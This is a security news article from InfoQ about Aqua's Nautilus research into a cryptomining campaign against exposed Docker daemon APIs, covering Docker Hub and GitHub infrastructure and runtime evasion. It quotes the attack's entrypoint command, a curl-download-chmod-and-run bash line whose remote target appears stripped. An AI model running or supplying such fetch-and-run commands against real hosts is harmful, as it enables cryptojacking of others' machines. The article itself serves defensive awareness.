Facilitating the Spread of Knowledge and Innovation in Professional Software Development

Write for InfoQ


Choose your language

InfoQ Homepage News Attackers Found Building Malicious Container Images Directly on Host

Attackers Found Building Malicious Container Images Directly on Host

This item in japanese

Aqua’s cyber security research team, ‘Nautilus,’ has found a new attack technique used to target cloud-native environments using Docker image files to mine cryptocurrency.

The attack targets misconfigured open Docker Daemon API ports with container images that either have a potentially unwanted application (PUA) hidden within their image layers or download the PUA into their instantiated containers during runtime to evade detection. Further investigation by the team uncovered an associated 330k malicious image pulls from an infrastructure of 23 container images stored in Docker Hub.

The newer images in these accounts were designed to use advanced malicious methods, including defense evasion, lateral movement, and discovery techniques which demonstrates the evolving threat and the capability of this network. The Nautilus team discovered the threat through analysis of an attack against their misconfigured Docker Daemon API honeypot.

This type of attack is initiated by targeting the host with a command to download a shell file from a GitHub account. Downloading the malicious image from a remote source during runtime minimises the chance of identification.

The Nautilus team, Palo Alto Networks, and other security organisations suggest dynamic threat scanning as the way to combat the threat, since this grades the image on what it does on execution, rather than relying on signatures to identify threats. The suspected file is executed in a virtual machine, analyzed to see what it does, and graded on the result.

The image ubuntuz/jessy:latest attacked Aqua’s honeypot 42 times between March 17th, 2020, and June 3rd, 2020.

The attack on the team’s misconfigured Docker daemon started when the container was initiated with a command aimed to download a shell file from a remote resource:

/bin/bash -c curl -o /opt/ && chmod 777 /opt/ && /bin/bash /opt/ >/dev/null 2>&1 ; tail -f /dev/null

The payload included a shell script designed to download the executable and linkable format (ELF) file (a PUA), running a mining command with hardcoded parameters. It also sends the host’s IP address to IPLogger (IP address tracker) which is used by the attacker to monitor the infected host machines. This was the command at the entrypoint.

The wider infrastructure that the team investigated includes dozens of Docker Hub and GitHub accounts being used to host suspect container images. The team initially uncovered seven different Docker Hub community members hosting the malicious images, but further investigation showed a connection between these container images and 15 different GitHub accounts, which the team assessed were dedicated solely to this infrastructure. This structure allows the attack to download images from remote sources that are considered safe during container runtime, and run them on the host. The payload of these images contains an ELF file that is designed to mine cryptocurrency, a JSON file that contains the configuration, and a shell script that executes the commands.

This attack further underscores the ongoing challenge for security teams to secure their infrastructure with overlapping layers of defence. Earlier this year, Palo Alto Networks’ security intelligence team, ‘Unit 42,’ shared the results of their own investigation into unsecured Docker daemons. Between September and December 2019, they used the Internet of Things search engines Shodan and Censys, and found around 5,000 Docker daemons exposed to the internet, 10-15% of which could be accessed without authentication. Team Nautilus’s latest findings confirm that attackers are actively taking advantage of this gap.

Team Nautilus told InfoQ that they are increasingly seeing methods of operation where malign actors use clean, vanilla images and build the attack during runtime. This is a change from even a couple of years ago where it was typical to see an image with two to three layers and a command to execute a miner hidden in one of the layers. This increases the persistence of the attacker’s infrastructure by bypassing typical security measures like image scanning, or restricting communications with known suspicious sources and registries. Furthermore, the image is not stored anywhere and so it will not be taken down. Finally, the name of the image and possibly its ID are randomly generated and probably unique to each host. This bypasses any restricted lists of specific malicious images or sources.

Rate this Article